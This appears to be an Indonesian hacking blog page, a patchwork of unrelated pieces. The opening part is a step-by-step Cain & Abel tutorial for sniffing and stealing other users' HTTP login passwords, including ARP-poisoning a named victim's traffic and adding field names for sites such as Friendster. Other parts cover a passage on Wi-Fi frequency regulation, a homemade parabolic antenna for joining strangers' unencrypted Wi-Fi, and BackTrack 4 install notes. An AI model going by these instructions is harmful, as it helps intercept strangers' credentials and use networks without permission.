Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark

* Buka program Cain anda

* Klik pada bagian configure

* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.

* Setelah itu apply settingannya dan klik ok

* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri

* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”

* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana

* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)

* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR

* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll

* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda

* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)

* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Secara teknologis jalur frekuensi -baik 2,4 GHz maupun 5 GHz- yang menjadi wadah operasional teknologi Wi-Fi tidak bebas dari keterbatasan .

Pasalnya, pengguna dalam suatu area baru dapat memanfaatkan sistem Internet nirkabel ini dengan optimal, bila semua perangkat yang dipakai pada area itu menggunakan daya pancar yang seragam dan terbatas.

Apabila prasyarat tersebut tidak diindahkan, dapat dipastikan akan terjadi harmful interference bukan hanya antar perangkat pengguna Internet, tetapi juga dengan perangkat sistem telekomunikasi lainnya.

Bila interferensi tersebut berlanjut -karena penggunanya ingin lebih unggul dari pengguna lainnya, maupun karenanya kurangnya pemahaman terhadap keterbatasan teknologinya- pada akhirnya akan membuat jalur frekuensi 2,4 GHz dan 5 GHz tidak dapat dimanfaatkan secara optimal.

Keterbatasan lain dari kedua jalur frekuensi nirkabel ini (khususnya 2,4 GHz) ialah karena juga digunakan untuk keperluan ISM (industrial, science and medical).

Konsekuensinya, penggunaan komunikasi radio atau perangkat telekomunikasi lain yang bekerja pada pada pita frekuensi itu harus siap menerima gangguan dari perangkat ISM, sebagaimana tertuang dalam S5.150 dari Radio Regulation.

Dalam rekomendasi ITU-R SM.1056, diinformasikan juga karakteristik perangkat ISM yang pada intinya bertujuan mencegah timbulnya interferensi, baik antar perangkat ISM maupun dengan perangkat telekomunikasi lainnnya.

Rekomendasi yang sama menegaskan bahwa setiap anggota ITU bebas menetapkan persyaratan administrasi dan aturan hukum yang terkait dengan keharusan pembatasan daya.

Menyadari keterbatasan dan dampak yang mungkin timbul dari penggunaan kedua jalur frekuensi nirkabel tersebut, berbagai negara lalu menetapkan regulasi yang membatasi daya pancar perangkat yang digunakan.

Sinyal Wireless

Sinyal wireless LAN normalnya dapat ditangkap pada kisaran sekitar 200 meter dari access point, tetapi client yang menggunakan antena eksternal dapat menangkap sinyal sampai sejauh 1000 meter. Apabila anda menempatkan AP dekat pintu atau jendela, dapat dipastikan para tetangga dapat ikut menikmati akses Internet atau melakukan sniffing terhadap traffic network.

Apabila infrastruktur wireless LAN itu melibatkan koneksi wireless antar-gedung tinggi, maka client yang tidak diinginkan dapat melakukan sniffing dari bawah sejauh sampai 2.500 kaki (762 meter). Jadi walaupun sinyal wireless LAN para ISP yang dipasangkan di puncak-puncak gedung tinggi dapat di-sniffing dari bawah (dikenal sebagai war flying).

Jika anda ingin connect internet menggunakan wifi sementara anda jauh AP atau dari tempat wifi yang tersedia anda bisa mendekatkan diri dengan area tersebut dan bisa main internet sepuasnya dengan langkah sebagai berikut

1) Anda harus memiliki USB Wireless Adapter. Yang bisa anda dapatkan ditoko toko komputer dengan harga berkisar Rp 210.000 (cukup murah untuk technology secanggih ini) + antenna UHF bentuk parabola.

2) Langkah ini merupakan langkah kunci, yaitu dengan menggunakan antenna UHV yang berbentuk Grid Parabolic sebagai Reflector untuk memperkuat sinyal.

3) Untuk lebih memperkuat daya reflexy dari parabole anda dapat menambahkan kawat kasa pada seluruh permukaan, lalujangan lupa disekrup dengan rangka parabola. Anda juga bisa menambahkan alumunium foil.

4) Pasanglah USB WiFi Adapter pada tiang penyangga yang ada di tengah parabola. Apabila terlalu panjang dari fokusnya dapat dipotong.

Usahakan agar USB WiFI terletak pada fokus parabola. Ingat kan rumus fokus parabola. Kalau ragu nih rumus sederhananya.

F= D(kuadrat) / 4(kuadrat).c

D: diameter parabola

C: kedalaman parabola

5) pasang kabel USB( High Speed 2.0 usb cable system) sedemikian rupa.

6) Lalu pasang kembali tiang penyangga USB wifi pada parabola. Pasang pada pipa besi untuk mempermudah antenne supaya enak diputar putar.

7) Kalau udah install driver USB WiFI tadi (bawaan pabrik).

Lalu install “NETWORK STUMBLER” untuk mencari sinyal yang kuat dan terdekat.

8) Pasang antenna diluar dan masukkan kabel USB pada port komputer anda. Scan pake Net Stumbler. Cari jaringan yang ngga’ di ENCRYPT dan jaraknya paling deket dengan anda. Lalu join aja.

Akses ke wifi :

jenis :

secure, artinya untuk dapat mengakses kita harus memasukkan password

unsecure, artinya kita bisa mengakses wifi tanpa harus mengisikan password, jd langsung konek.

Yang unsecure, kadang juga tidak bisa mengakses internet walau bisa konek ke jaringan. Hal ini karena ada pengaturan IP. Untuk server yang menggunakan ip dinamik, maka kita tidak usah pusing dengan ip, karena ip sdh otomatis dimasukkan oleh server ke klien (computer kita).

Untuk server yang menggunakan static ip, maka kita harus secara manual memasukkan ip untuk computer/laptop kita.

Jika kita bisa konek ke wifi tp tidak bisa akses internet, cobalah ubah ip laptop kita. Caranya :

klik kanan icon wifi di bawah kanan layar

pilih properties

pilih Advanced

pada bagian connection pilih Internet Protocol (TCP/IP)

pilih static ip

pada ip isi : 192.168.0.212

pada Net Mask isi : 255.255.255.0

pada getway isi : 192.168.0.1

pada dns server isi : 192.168.0.1

klik ok.

Download BackTrack4 dan cara Installnya

2010-01-17T03:55:00.000-08:00

Tim pengembang 'Remote Exploit' dibalik proyek BackTrack mengumumkan tersedianya generasi baru BackTrack 4 Beta siap untuk diujicoba. BT4 memperkenalkan konsep berikut sejumlah fitur baru yang menarik. Media BT4 tidak lagi sekedar LiveCD untuk pengujian penetrasi belaka, lebih dari itu ia kini merupakan sebuah Sistem Operasi penuh.
BT4 kini menggunakan Debian sebagai basis dan memanfaatkan repositori Ubuntu, ia dapat senantiasa di-update atau di-upgrade. Bila di-sinkronisasi dengan repositori yang disediakan BackTrack, ia akan selalu up-to-date.

Fitur-fitur baru termsuk:

* the Kernel was updated to version 2.6.28.1 bringing better hardware support;
* BackTrack 4 Beta can now be booted over a network, using PXE supported cards;
* SAINT EXPLOIT, a network vulnerability assessment tool, and MALTEGO 2.0.2, an Open Source intelligence and forensic app, are now included;
* the latest mac80211 wireless injection patches were applied along with speed improvements for rtl8187;
* Pico e12 and e16 cards are now 100% functional with native support, enabling BackTrack 4 to take advantage of everything these incredibly small devices have to offer;
* Unicornscan, an information gathering and correlation engine is fully functional and features a web front end and postgress logging support;
* RFID support;
* Pyrit CUDA support and many more new and updated tools.

Backtrack merupakan distro security live cd, yang dilengkapi dengan berbagai tool untuk melakukan penetrasi keamanan system pada jaringan dan komputer. Backtrack 4 walaupun berupa distro live cd bisa juga diinstall pada hardisk, berikut langkah-langkah yang diperlukan untuk menginstal backtrack 4 ke hardisk:

* Siapkan 2 partisi kososng yaitu partisi untuk SWAP dan EXT3.
* Booting dengan CD Backtrack 4.
* Setelah masuk, ketik "sudo su"
* Ketik "startx" untuk masuk ke GUI.
* Cari file "install.sh" pada desktop, klik untuk install backtrak ke hardisk.
* Klik "continue anyway" jika ada warning "language crashed".
* Isi lokasi anda, pilih keyboard layout:USA, kemudian klik forward.
* Pilih manual pada proses prepare disk space, lanjutkan dengan klik forward.
* Pilih dan edit partisi yang akan di install backtrack dan installasi swap.
* Lanjutkan klik forward pada proses prepare install.
* Isi nama, password serta nama komputer, klik forward
* Pada proses "migrate documents and settings", klik forward.
* Klik install untuk memulai installasi
* Selesai, reboot, keluarkan cd backtrack.

download BAckTrack4 iso 1,3Gb

Selamat berjuang mengalahkan backtrack.